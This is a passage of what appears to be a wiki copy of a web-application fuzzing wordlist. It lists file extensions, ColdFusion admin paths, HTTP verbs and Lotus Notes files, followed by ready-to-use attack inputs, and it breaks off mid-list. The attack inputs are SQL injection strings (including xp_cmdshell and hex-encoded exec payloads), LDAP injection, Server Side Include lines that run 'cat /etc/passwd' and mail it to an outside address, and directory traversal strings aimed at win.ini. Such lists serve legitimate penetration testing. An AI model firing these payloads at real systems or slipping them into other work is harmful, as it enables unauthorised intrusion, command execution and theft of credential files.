.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: 30 July 2007 - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Some server side include statements&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
